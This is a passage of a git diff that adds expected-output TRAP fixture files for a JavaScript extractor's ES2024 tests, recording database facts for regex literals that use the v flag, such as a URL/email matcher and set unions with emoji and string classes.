+regexp_const_value(#20070,"b") +#20072=* +regexpterm(#20072,14,#20066,2,"d") +#20073=@"loc,{#10000},3,13,3,13" +locations_default(#20073,#10000,3,13,3,13) +hasLocation(#20072,#20073) +regexp_const_value(#20072,"d") +#20074=* +regexpterm(#20074,23,#20057,2,"[bde]") +#20075=@"loc,{#10000},3,17,3,21" +locations_default(#20075,#10000,3,17,3,21) +hasLocation(#20074,#20075) +#20076=* +regexpterm(#20076,14,#20074,0,"b") +#20077=@"loc,{#10000},3,18,3,18" +locations_default(#20077,#10000,3,18,3,18) +hasLocation(#20076,#20077) +regexp_const_value(#20076,"b") +#20078=* +regexpterm(#20078,14,#20074,1,"d") +#20079=@"loc,{#10000},3,19,3,19" +locations_default(#20079,#10000,3,19,3,19) +hasLocation(#20078,#20079) +regexp_const_value(#20078,"d") +#20080=* +regexpterm(#20080,14,#20074,2,"e") +#20081=@"loc,{#10000},3,20,3,20" +locations_default(#20081,#10000,3,20,3,20) +hasLocation(#20080,#20081) +regexp_const_value(#20080,"e") +#20082=* +entry_cfg_node(#20082,#20001) +#20083=@"loc,{#10000},1,1,1,0" +locations_default(#20083,#10000,1,1,1,0) +hasLocation(#20082,#20083) +#20084=* +exit_cfg_node(#20084,#20001) +hasLocation(#20084,#20021) +successor(#20053,#20054) +successor(#20054,#20084) +successor(#20032,#20033) +successor(#20033,#20053) +successor(#20023,#20024) +successor(#20024,#20032) +successor(#20082,#20023) +numlines(#10000,3,3,0) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/test.js.trap b/javascript/extractor/tests/es2024/output/trap/test.js.trap new file mode 100644 index 000000000000..2cacd2029baa --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/test.js.trap @@ -0,0 +1,510 @@ +#10000=@"/test.js;sourcefile" +files(#10000,"/test.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"const regex = /\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv;"," +") +#20003=@"loc,{#10000},1,1,1,172" +locations_default(#20003,#10000,1,1,1,172) +hasLocation(#20002,#20003) +numlines(#20001,1,1,0) +#20004=* +tokeninfo(#20004,7,#20001,0,"const") +#20005=@"loc,{#10000},1,1,1,5" +locations_default(#20005,#10000,1,1,1,5) +hasLocation(#20004,#20005) +#20006=* +tokeninfo(#20006,6,#20001,1,"regex") +#20007=@"loc,{#10000},1,7,1,11" +locations_default(#20007,#10000,1,7,1,11) +hasLocation(#20006,#20007) +#20008=* +tokeninfo(#20008,8,#20001,2,"=") +#20009=@"loc,{#10000},1,13,1,13" +locations_default(#20009,#10000,1,13,1,13) +hasLocation(#20008,#20009) +#20010=* +tokeninfo(#20010,5,#20001,3,"/\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv") +#20011=@"loc,{#10000},1,15,1,171" +locations_default(#20011,#10000,1,15,1,171) +hasLocation(#20010,#20011) +#20012=* +tokeninfo(#20012,8,#20001,4,";") +#20013=@"loc,{#10000},1,172,1,172" +locations_default(#20013,#10000,1,172,1,172) +hasLocation(#20012,#20013) +#20014=* +tokeninfo(#20014,0,#20001,5,"") +#20015=@"loc,{#10000},2,1,2,0" +locations_default(#20015,#10000,2,1,2,0) +hasLocation(#20014,#20015) +toplevels(#20001,0) +#20016=@"loc,{#10000},1,1,2,0" +locations_default(#20016,#10000,1,1,2,0) +hasLocation(#20001,#20016) +#20017=@"var;{regex};{#20000}" +variables(#20017,"regex",#20000) +#20018=* +stmts(#20018,22,#20001,0,"const r ... +)/gmv;") +hasLocation(#20018,#20003) +stmt_containers(#20018,#20001) +#20019=* +exprs(#20019,64,#20018,0,"regex = ... )+)/gmv") +#20020=@"loc,{#10000},1,7,1,171" +locations_default(#20020,#10000,1,7,1,171) +hasLocation(#20019,#20020) +enclosing_stmt(#20019,#20018) +expr_containers(#20019,#20001) +#20021=* +exprs(#20021,78,#20019,0,"regex") +hasLocation(#20021,#20007) +enclosing_stmt(#20021,#20018) +expr_containers(#20021,#20001) +literals("regex","regex",#20021) +decl(#20021,#20017) +#20022=* +exprs(#20022,5,#20019,1,"/\b(?:h ... )+)/gmv") +hasLocation(#20022,#20011) +enclosing_stmt(#20022,#20018) +expr_containers(#20022,#20001) +literals("/\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv","/\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv",#20022) +#20023=* +regexpterm(#20023,0,#20022,0,"\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)") +#20024=@"loc,{#10000},1,16,1,167" +locations_default(#20024,#10000,1,16,1,167) +hasLocation(#20023,#20024) +#20025=* +regexpterm(#20025,1,#20023,0,"\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+") +#20026=@"loc,{#10000},1,16,1,98" +locations_default(#20026,#10000,1,16,1,98) +hasLocation(#20025,#20026) +#20027=* +regexpterm(#20027,4,#20025,0,"\b") +#20028=@"loc,{#10000},1,16,1,17" +locations_default(#20028,#10000,1,16,1,17) +hasLocation(#20027,#20028) +#20029=* +regexpterm(#20029,13,#20025,1,"(?:https?:\/\/|mailto:|www\.)") +#20030=@"loc,{#10000},1,18,1,46" +locations_default(#20030,#10000,1,18,1,46) +hasLocation(#20029,#20030) +#20031=* +regexpterm(#20031,0,#20029,0,"https?:\/\/|mailto:|www\.") +#20032=@"loc,{#10000},1,21,1,45" +locations_default(#20032,#10000,1,21,1,45) +hasLocation(#20031,#20032) +#20033=* +regexpterm(#20033,1,#20031,0,"https?:\/\/") +#20034=@"loc,{#10000},1,21,1,31" +locations_default(#20034,#10000,1,21,1,31) +hasLocation(#20033,#20034) +#20035=* +regexpterm(#20035,14,#20033,0,"http") +#20036=@"loc,{#10000},1,21,1,24" +locations_default(#20036,#10000,1,21,1,24) +hasLocation(#20035,#20036) +regexp_const_value(#20035,"http") +#20037=* +regexpterm(#20037,10,#20033,1,"s?") +#20038=@"loc,{#10000},1,25,1,26" +locations_default(#20038,#10000,1,25,1,26) +hasLocation(#20037,#20038) +is_greedy(#20037) +#20039=* +regexpterm(#20039,14,#20037,0,"s") +#20040=@"loc,{#10000},1,25,1,25" +locations_default(#20040,#10000,1,25,1,25) +hasLocation(#20039,#20040) +regexp_const_value(#20039,"s") +#20041=* +regexpterm(#20041,14,#20033,2,":") +#20042=@"loc,{#10000},1,27,1,27" +locations_default(#20042,#10000,1,27,1,27) +hasLocation(#20041,#20042) +regexp_const_value(#20041,":") +#20043=* +regexpterm(#20043,21,#20033,3,"\/") +#20044=@"loc,{#10000},1,28,1,29" +locations_default(#20044,#10000,1,28,1,29) +hasLocation(#20043,#20044) +regexp_const_value(#20043,"/") +#20045=* +regexpterm(#20045,21,#20033,4,"\/") +#20046=@"loc,{#10000},1,30,1,31" +locations_default(#20046,#10000,1,30,1,31) +hasLocation(#20045,#20046) +regexp_const_value(#20045,"/") +#20047=* +regexpterm(#20047,14,#20031,1,"mailto:") +#20048=@"loc,{#10000},1,33,1,39" +locations_default(#20048,#10000,1,33,1,39) +hasLocation(#20047,#20048) +regexp_const_value(#20047,"mailto:") +#20049=* +regexpterm(#20049,1,#20031,2,"www\.") +#20050=@"loc,{#10000},1,41,1,45" +locations_default(#20050,#10000,1,41,1,45) +hasLocation(#20049,#20050) +#20051=* +regexpterm(#20051,14,#20049,0,"www") +#20052=@"loc,{#10000},1,41,1,43" +locations_default(#20052,#10000,1,41,1,43) +hasLocation(#20051,#20052) +regexp_const_value(#20051,"www") +#20053=* +regexpterm(#20053,21,#20049,1,"\.") +#20054=@"loc,{#10000},1,44,1,45" +locations_default(#20054,#10000,1,44,1,45) +hasLocation(#20053,#20054) +regexp_const_value(#20053,".") +#20055=* +regexpterm(#20055,9,#20025,2,"(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+") +#20056=@"loc,{#10000},1,47,1,98" +locations_default(#20056,#10000,1,47,1,98) +hasLocation(#20055,#20056) +is_greedy(#20055) +#20057=* +regexpterm(#20057,13,#20055,0,"(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])") +#20058=@"loc,{#10000},1,47,1,97" +locations_default(#20058,#10000,1,47,1,97) +hasLocation(#20057,#20058) +#20059=* +regexpterm(#20059,0,#20057,0,"[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]]") +#20060=@"loc,{#10000},1,50,1,96" +locations_default(#20060,#10000,1,50,1,96) +hasLocation(#20059,#20060) +#20061=* +regexpterm(#20061,23,#20059,0,"[\S--[\p{P}<>]]") +#20062=@"loc,{#10000},1,50,1,64" +locations_default(#20062,#10000,1,50,1,64) +hasLocation(#20061,#20062) +#20063=* +regexpterm(#20063,30,#20061,0,"[\S--[\p{P}<>]]") +hasLocation(#20063,#20062) +#20064=* +regexpterm(#20064,20,#20063,0,"\S") +#20065=@"loc,{#10000},1,51,1,52" +locations_default(#20065,#10000,1,51,1,52) +hasLocation(#20064,#20065) +char_class_escape(#20064,"S") +#20066=* +regexpterm(#20066,23,#20063,1,"[\p{P}<>]") +#20067=@"loc,{#10000},1,55,1,63" +locations_default(#20067,#10000,1,55,1,63) +hasLocation(#20066,#20067) +#20068=* +regexpterm(#20068,27,#20066,0,"\p{P}") +#20069=@"loc,{#10000},1,56,1,60" +locations_default(#20069,#10000,1,56,1,60) +hasLocation(#20068,#20069) +unicode_property_escapename(#20068,"P") +#20070=* +regexpterm(#20070,14,#20066,1,"<") +#20071=@"loc,{#10000},1,61,1,61" +locations_default(#20071,#10000,1,61,1,61) +hasLocation(#20070,#20071) +regexp_const_value(#20070,"<") +#20072=* +regexpterm(#20072,14,#20066,2,">") +#20073=@"loc,{#10000},1,62,1,62" +locations_default(#20073,#10000,1,62,1,62) +hasLocation(#20072,#20073) +regexp_const_value(#20072,">") +#20074=* +regexpterm(#20074,21,#20059,1,"\/") +#20075=@"loc,{#10000},1,66,1,67" +locations_default(#20075,#10000,1,66,1,67) +hasLocation(#20074,#20075) +regexp_const_value(#20074,"/") +#20076=* +regexpterm(#20076,1,#20059,2,"[\S--[\[\]]]+[\S--[\p{P}<>]]") +#20077=@"loc,{#10000},1,69,1,96" +locations_default(#20077,#10000,1,69,1,96) +hasLocation(#20076,#20077) +#20078=* +regexpterm(#20078,9,#20076,0,"[\S--[\[\]]]+") +#20079=@"loc,{#10000},1,69,1,81" +locations_default(#20079,#10000,1,69,1,81) +hasLocation(#20078,#20079) +is_greedy(#20078) +#20080=* +regexpterm(#20080,23,#20078,0,"[\S--[\[\]]]") +#20081=@"loc,{#10000},1,69,1,80" +locations_default(#20081,#10000,1,69,1,80) +hasLocation(#20080,#20081) +#20082=* +regexpterm(#20082,30,#20080,0,"[\S--[\[\]]]") +hasLocation(#20082,#20081) +#20083=* +regexpterm(#20083,20,#20082,0,"\S") +#20084=@"loc,{#10000},1,70,1,71" +locations_default(#20084,#10000,1,70,1,71) +hasLocation(#20083,#20084) +char_class_escape(#20083,"S") +#20085=* +regexpterm(#20085,23,#20082,1,"[\[\]]") +#20086=@"loc,{#10000},1,74,1,79" +locations_default(#20086,#10000,1,74,1,79) +hasLocation(#20085,#20086) +#20087=* +regexpterm(#20087,21,#20085,0,"\[") +#20088=@"loc,{#10000},1,75,1,76" +locations_default(#20088,#10000,1,75,1,76) +hasLocation(#20087,#20088) +regexp_const_value(#20087,"[") +#20089=* +regexpterm(#20089,21,#20085,1,"\]") +#20090=@"loc,{#10000},1,77,1,78" +locations_default(#20090,#10000,1,77,1,78) +hasLocation(#20089,#20090) +regexp_const_value(#20089,"]") +#20091=* +regexpterm(#20091,23,#20076,1,"[\S--[\p{P}<>]]") +#20092=@"loc,{#10000},1,82,1,96" +locations_default(#20092,#10000,1,82,1,96) +hasLocation(#20091,#20092) +#20093=* +regexpterm(#20093,30,#20091,0,"[\S--[\p{P}<>]]") +hasLocation(#20093,#20092) +#20094=* +regexpterm(#20094,20,#20093,0,"\S") +#20095=@"loc,{#10000},1,83,1,84" +locations_default(#20095,#10000,1,83,1,84) +hasLocation(#20094,#20095) +char_class_escape(#20094,"S") +#20096=* +regexpterm(#20096,23,#20093,1,"[\p{P}<>]") +#20097=@"loc,{#10000},1,87,1,95" +locations_default(#20097,#10000,1,87,1,95) +hasLocation(#20096,#20097) +#20098=* +regexpterm(#20098,27,#20096,0,"\p{P}") +#20099=@"loc,{#10000},1,88,1,92" +locations_default(#20099,#10000,1,88,1,92) +hasLocation(#20098,#20099) +unicode_property_escapename(#20098,"P") +#20100=* +regexpterm(#20100,14,#20096,1,"<") +#20101=@"loc,{#10000},1,93,1,93" +locations_default(#20101,#10000,1,93,1,93) +hasLocation(#20100,#20101) +regexp_const_value(#20100,"<") +#20102=* +regexpterm(#20102,14,#20096,2,">") +#20103=@"loc,{#10000},1,94,1,94" +locations_default(#20103,#10000,1,94,1,94) +hasLocation(#20102,#20103) +regexp_const_value(#20102,">") +#20104=* +regexpterm(#20104,1,#20023,1,"\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)") +#20105=@"loc,{#10000},1,100,1,167" +locations_default(#20105,#10000,1,100,1,167) +hasLocation(#20104,#20105) +#20106=* +regexpterm(#20106,4,#20104,0,"\b") +#20107=@"loc,{#10000},1,100,1,101" +locations_default(#20107,#10000,1,100,1,101) +hasLocation(#20106,#20107) +#20108=* +regexpterm(#20108,9,#20104,1,"[\S--[@\p{Ps}\p{Pe}<>]]+") +#20109=@"loc,{#10000},1,102,1,125" +locations_default(#20109,#10000,1,102,1,125) +hasLocation(#20108,#20109) +is_greedy(#20108) +#20110=* +regexpterm(#20110,23,#20108,0,"[\S--[@\p{Ps}\p{Pe}<>]]") +#20111=@"loc,{#10000},1,102,1,124" +locations_default(#20111,#10000,1,102,1,124) +hasLocation(#20110,#20111) +#20112=* +regexpterm(#20112,30,#20110,0,"[\S--[@\p{Ps}\p{Pe}<>]]") +hasLocation(#20112,#20111) +#20113=* +regexpterm(#20113,20,#20112,0,"\S") +#20114=@"loc,{#10000},1,103,1,104" +locations_default(#20114,#10000,1,103,1,104) +hasLocation(#20113,#20114) +char_class_escape(#20113,"S") +#20115=* +regexpterm(#20115,23,#20112,1,"[@\p{Ps}\p{Pe}<>]") +#20116=@"loc,{#10000},1,107,1,123" +locations_default(#20116,#10000,1,107,1,123) +hasLocation(#20115,#20116) +#20117=* +regexpterm(#20117,14,#20115,0,"@") +#20118=@"loc,{#10000},1,108,1,108" +locations_default(#20118,#10000,1,108,1,108) +hasLocation(#20117,#20118) +regexp_const_value(#20117,"@") +#20119=* +regexpterm(#20119,27,#20115,1,"\p{Ps}") +#20120=@"loc,{#10000},1,109,1,114" +locations_default(#20120,#10000,1,109,1,114) +hasLocation(#20119,#20120) +unicode_property_escapename(#20119,"Ps") +#20121=* +regexpterm(#20121,27,#20115,2,"\p{Pe}") +#20122=@"loc,{#10000},1,115,1,120" +locations_default(#20122,#10000,1,115,1,120) +hasLocation(#20121,#20122) +unicode_property_escapename(#20121,"Pe") +#20123=* +regexpterm(#20123,14,#20115,3,"<") +#20124=@"loc,{#10000},1,121,1,121" +locations_default(#20124,#10000,1,121,1,121) +hasLocation(#20123,#20124) +regexp_const_value(#20123,"<") +#20125=* +regexpterm(#20125,14,#20115,4,">") +#20126=@"loc,{#10000},1,122,1,122" +locations_default(#20126,#10000,1,122,1,122) +hasLocation(#20125,#20126) +regexp_const_value(#20125,">") +#20127=* +regexpterm(#20127,14,#20104,2,"@") +#20128=@"loc,{#10000},1,126,1,126" +locations_default(#20128,#10000,1,126,1,126) +hasLocation(#20127,#20128) +regexp_const_value(#20127,"@") +#20129=* +regexpterm(#20129,13,#20104,3,"([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)") +#20130=@"loc,{#10000},1,127,1,167" +locations_default(#20130,#10000,1,127,1,167) +hasLocation(#20129,#20130) +is_capture(#20129,1) +#20131=* +regexpterm(#20131,1,#20129,0,"[\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+") +#20132=@"loc,{#10000},1,128,1,166" +locations_default(#20132,#10000,1,128,1,166) +hasLocation(#20131,#20132) +#20133=* +regexpterm(#20133,9,#20131,0,"[\S--[\p{P}<>]]+") +#20134=@"loc,{#10000},1,128,1,143" +locations_default(#20134,#10000,1,128,1,143) +hasLocation(#20133,#20134) +is_greedy(#20133) +#20135=* +regexpterm(#20135,23,#20133,0,"[\S--[\p{P}<>]]") +#20136=@"loc,{#10000},1,128,1,142" +locations_default(#20136,#10000,1,128,1,142) +hasLocation(#20135,#20136) +#20137=* +regexpterm(#20137,30,#20135,0,"[\S--[\p{P}<>]]") +hasLocation(#20137,#20136) +#20138=* +regexpterm(#20138,20,#20137,0,"\S") +#20139=@"loc,{#10000},1,129,1,130" +locations_default(#20139,#10000,1,129,1,130) +hasLocation(#20138,#20139) +char_class_escape(#20138,"S") +#20140=* +regexpterm(#20140,23,#20137,1,"[\p{P}<>]") +#20141=@"loc,{#10000},1,133,1,141" +locations_default(#20141,#10000,1,133,1,141) +hasLocation(#20140,#20141) +#20142=* +regexpterm(#20142,27,#20140,0,"\p{P}") +#20143=@"loc,{#10000},1,134,1,138" +locations_default(#20143,#10000,1,134,1,138) +hasLocation(#20142,#20143) +unicode_property_escapename(#20142,"P") +#20144=* +regexpterm(#20144,14,#20140,1,"<") +#20145=@"loc,{#10000},1,139,1,139" +locations_default(#20145,#10000,1,139,1,139) +hasLocation(#20144,#20145) +regexp_const_value(#20144,"<") +#20146=* +regexpterm(#20146,14,#20140,2,">") +#20147=@"loc,{#10000},1,140,1,140" +locations_default(#20147,#10000,1,140,1,140) +hasLocation(#20146,#20147) +regexp_const_value(#20146,">") +#20148=* +regexpterm(#20148,9,#20131,1,"(?:\.[\S--[\p{P}<>]]+)+") +#20149=@"loc,{#10000},1,144,1,166" +locations_default(#20149,#10000,1,144,1,166) +hasLocation(#20148,#20149) +is_greedy(#20148) +#20150=* +regexpterm(#20150,13,#20148,0,"(?:\.[\S--[\p{P}<>]]+)") +#20151=@"loc,{#10000},1,144,1,165" +locations_default(#20151,#10000,1,144,1,165) +hasLocation(#20150,#20151) +#20152=* +regexpterm(#20152,1,#20150,0,"\.[\S--[\p{P}<>]]+") +#20153=@"loc,{#10000},1,147,1,164" +locations_default(#20153,#10000,1,147,1,164) +hasLocation(#20152,#20153) +#20154=* +regexpterm(#20154,21,#20152,0,"\.") +#20155=@"loc,{#10000},1,147,1,148" +locations_default(#20155,#10000,1,147,1,148) +hasLocation(#20154,#20155) +regexp_const_value(#20154,".") +#20156=* +regexpterm(#20156,9,#20152,1,"[\S--[\p{P}<>]]+") +#20157=@"loc,{#10000},1,149,1,164" +locations_default(#20157,#10000,1,149,1,164) +hasLocation(#20156,#20157) +is_greedy(#20156) +#20158=* +regexpterm(#20158,23,#20156,0,"[\S--[\p{P}<>]]") +#20159=@"loc,{#10000},1,149,1,163" +locations_default(#20159,#10000,1,149,1,163) +hasLocation(#20158,#20159) +#20160=* +regexpterm(#20160,30,#20158,0,"[\S--[\p{P}<>]]") +hasLocation(#20160,#20159) +#20161=* +regexpterm(#20161,20,#20160,0,"\S") +#20162=@"loc,{#10000},1,150,1,151" +locations_default(#20162,#10000,1,150,1,151) +hasLocation(#20161,#20162) +char_class_escape(#20161,"S") +#20163=* +regexpterm(#20163,23,#20160,1,"[\p{P}<>]") +#20164=@"loc,{#10000},1,154,1,162" +locations_default(#20164,#10000,1,154,1,162) +hasLocation(#20163,#20164) +#20165=* +regexpterm(#20165,27,#20163,0,"\p{P}") +#20166=@"loc,{#10000},1,155,1,159" +locations_default(#20166,#10000,1,155,1,159) +hasLocation(#20165,#20166) +unicode_property_escapename(#20165,"P") +#20167=* +regexpterm(#20167,14,#20163,1,"<") +#20168=@"loc,{#10000},1,160,1,160" +locations_default(#20168,#10000,1,160,1,160) +hasLocation(#20167,#20168) +regexp_const_value(#20167,"<") +#20169=* +regexpterm(#20169,14,#20163,2,">") +#20170=@"loc,{#10000},1,161,1,161" +locations_default(#20170,#10000,1,161,1,161) +hasLocation(#20169,#20170) +regexp_const_value(#20169,">") +#20171=* +entry_cfg_node(#20171,#20001) +#20172=@"loc,{#10000},1,1,1,0" +locations_default(#20172,#10000,1,1,1,0) +hasLocation(#20171,#20172) +#20173=* +exit_cfg_node(#20173,#20001) +hasLocation(#20173,#20015) +successor(#20018,#20021) +successor(#20022,#20019) +successor(#20021,#20022) +successor(#20019,#20173) +successor(#20171,#20018) +numlines(#10000,1,1,0) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/union.js.trap b/javascript/extractor/tests/es2024/output/trap/union.js.trap new file mode 100644 index 000000000000..31d98f755e85 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/union.js.trap @@ -0,0 +1,392 @@ +#10000=@"/union.js;sourcefile" +files(#10000,"/union.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"/[\p{Script_Extensions=Greek}\p{RGI_Emoji}]/v;"," +") +#20003=@"loc,{#10000},1,1,1,46" +locations_default(#20003,#10000,1,1,1,46) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"/[[abc][cbd]]/v;"," +") +#20005=@"loc,{#10000},2,1,2,16" +locations_default(#20005,#10000,2,1,2,16) +hasLocation(#20004,#20005) +#20006=* +lines(#20006,#20001,"/[\p{Emoji}\q{a&}byz]/v;"," +") +#20007=@"loc,{#10000},3,1,3,24" +locations_default(#20007,#10000,3,1,3,24) +hasLocation(#20006,#20007) +#20008=* +lines(#20008,#20001,"/[\q{\\\}a&}byz]/v;"," +") +#20009=@"loc,{#10000},4,1,4,19" +locations_default(#20009,#10000,4,1,4,19) +hasLocation(#20008,#20009) +#20010=* +lines(#20010,#20001,"/[\q{\\}]/v;"," +") +#20011=@"loc,{#10000},5,1,5,12" +locations_default(#20011,#10000,5,1,5,12) +hasLocation(#20010,#20011) +#20012=* +lines(#20012,#20001,"/[\q{abc|cbd|\}}]/v;"," +") +#20013=@"loc,{#10000},6,1,6,20" +locations_default(#20013,#10000,6,1,6,20) +hasLocation(#20012,#20013) +numlines(#20001,6,6,0) +#20014=* +tokeninfo(#20014,5,#20001,0,"/[\p{Script_Extensions=Greek}\p{RGI_Emoji}]/v") +#20015=@"loc,{#10000},1,1,1,45" +locations_default(#20015,#10000,1,1,1,45) +hasLocation(#20014,#20015) +#20016=* +tokeninfo(#20016,8,#20001,1,";") +#20017=@"loc,{#10000},1,46,1,46" +locations_default(#20017,#10000,1,46,1,46) +hasLocation(#20016,#20017) +#20018=* +tokeninfo(#20018,5,#20001,2,"/[[abc][cbd]]/v") +#20019=@"loc,{#10000},2,1,2,15" +locations_default(#20019,#10000,2,1,2,15) +hasLocation(#20018,#20019) +#20020=* +tokeninfo(#20020,8,#20001,3,";") +#20021=@"loc,{#10000},2,16,2,16" +locations_default(#20021,#10000,2,16,2,16) +hasLocation(#20020,#20021) +#20022=* +tokeninfo(#20022,5,#20001,4,"/[\p{Emoji}\q{a&}byz]/v") +#20023=@"loc,{#10000},3,1,3,23" +locations_default(#20023,#10000,3,1,3,23) +hasLocation(#20022,#20023) +#20024=* +tokeninfo(#20024,8,#20001,5,";") +#20025=@"loc,{#10000},3,24,3,24" +locations_default(#20025,#10000,3,24,3,24) +hasLocation(#20024,#20025) +#20026=* +tokeninfo(#20026,5,#20001,6,"/[\q{\\\}a&}byz]/v") +#20027=@"loc,{#10000},4,1,4,18" +locations_default(#20027,#10000,4,1,4,18) +hasLocation(#20026,#20027) +#20028=* +tokeninfo(#20028,8,#20001,7,";") +#20029=@"loc,{#10000},4,19,4,19" +locations_default(#20029,#10000,4,19,4,19) +hasLocation(#20028,#20029) +#20030=* +tokeninfo(#20030,5,#20001,8,"/[\q{\\}]/v") +#20031=@"loc,{#10000},5,1,5,11" +locations_default(#20031,#10000,5,1,5,11) +hasLocation(#20030,#20031) +#20032=* +tokeninfo(#20032,8,#20001,9,";") +#20033=@"loc,{#10000},5,12,5,12" +locations_default(#20033,#10000,5,12,5,12) +hasLocation(#20032,#20033) +#20034=* +tokeninfo(#20034,5,#20001,10,"/[\q{abc|cbd|\}}]/v") +#20035=@"loc,{#10000},6,1,6,19" +locations_default(#20035,#10000,6,1,6,19) +hasLocation(#20034,#20035) +#20036=* +tokeninfo(#20036,8,#20001,11,";") +#20037=@"loc,{#10000},6,20,6,20" +locations_default(#20037,#10000,6,20,6,20) +hasLocation(#20036,#20037) +#20038=* +tokeninfo(#20038,0,#20001,12,"") +#20039=@"loc,{#10000},7,1,7,0" +locations_default(#20039,#10000,7,1,7,0) +hasLocation(#20038,#20039) +toplevels(#20001,0) +#20040=@"loc,{#10000},1,1,7,0" +locations_default(#20040,#10000,1,1,7,0) +hasLocation(#20001,#20040) +#20041=* +stmts(#20041,2,#20001,0,"/[\p{Sc ... ji}]/v;") +hasLocation(#20041,#20003) +stmt_containers(#20041,#20001) +#20042=* +exprs(#20042,5,#20041,0,"/[\p{Sc ... oji}]/v") +hasLocation(#20042,#20015) +enclosing_stmt(#20042,#20041) +expr_containers(#20042,#20001) +literals("/[\p{Script_Extensions=Greek}\p{RGI_Emoji}]/v","/[\p{Script_Extensions=Greek}\p{RGI_Emoji}]/v",#20042) +#20043=* +regexpterm(#20043,23,#20042,0,"[\p{Script_Extensions=Greek}\p{RGI_Emoji}]") +#20044=@"loc,{#10000},1,2,1,43" +locations_default(#20044,#10000,1,2,1,43) +hasLocation(#20043,#20044) +#20045=* +regexpterm(#20045,27,#20043,0,"\p{Script_Extensions=Greek}") +#20046=@"loc,{#10000},1,3,1,29" +locations_default(#20046,#10000,1,3,1,29) +hasLocation(#20045,#20046) +unicode_property_escapename(#20045,"Script_Extensions") +unicode_property_escapevalue(#20045,"Greek") +#20047=* +regexpterm(#20047,27,#20043,1,"\p{RGI_Emoji}") +#20048=@"loc,{#10000},1,30,1,42" +locations_default(#20048,#10000,1,30,1,42) +hasLocation(#20047,#20048) +unicode_property_escapename(#20047,"RGI_Emoji") +#20049=* +stmts(#20049,2,#20001,1,"/[[abc][cbd]]/v;") +hasLocation(#20049,#20005) +stmt_containers(#20049,#20001) +#20050=* +exprs(#20050,5,#20049,0,"/[[abc][cbd]]/v") +hasLocation(#20050,#20019) +enclosing_stmt(#20050,#20049) +expr_containers(#20050,#20001) +literals("/[[abc][cbd]]/v","/[[abc][cbd]]/v",#20050) +#20051=* +regexpterm(#20051,23,#20050,0,"[[abc][cbd]]") +#20052=@"loc,{#10000},2,2,2,13" +locations_default(#20052,#10000,2,2,2,13) +hasLocation(#20051,#20052) +#20053=* +regexpterm(#20053,23,#20051,0,"[abc]") +#20054=@"loc,{#10000},2,3,2,7" +locations_default(#20054,#10000,2,3,2,7) +hasLocation(#20053,#20054) +#20055=* +regexpterm(#20055,14,#20053,0,"a") +#20056=@"loc,{#10000},2,4,2,4" +locations_default(#20056,#10000,2,4,2,4) +hasLocation(#20055,#20056) +regexp_const_value(#20055,"a") +#20057=* +regexpterm(#20057,14,#20053,1,"b") +#20058=@"loc,{#10000},2,5,2,5" +locations_default(#20058,#10000,2,5,2,5) +hasLocation(#20057,#20058) +regexp_const_value(#20057,"b") +#20059=* +regexpterm(#20059,14,#20053,2,"c") +#20060=@"loc,{#10000},2,6,2,6" +locations_default(#20060,#10000,2,6,2,6) +hasLocation(#20059,#20060) +regexp_const_value(#20059,"c") +#20061=* +regexpterm(#20061,23,#20051,1,"[cbd]") +#20062=@"loc,{#10000},2,8,2,12" +locations_default(#20062,#10000,2,8,2,12) +hasLocation(#20061,#20062) +#20063=* +regexpterm(#20063,14,#20061,0,"c") +#20064=@"loc,{#10000},2,9,2,9" +locations_default(#20064,#10000,2,9,2,9) +hasLocation(#20063,#20064) +regexp_const_value(#20063,"c") +#20065=* +regexpterm(#20065,14,#20061,1,"b") +#20066=@"loc,{#10000},2,10,2,10" +locations_default(#20066,#10000,2,10,2,10) +hasLocation(#20065,#20066) +regexp_const_value(#20065,"b") +#20067=* 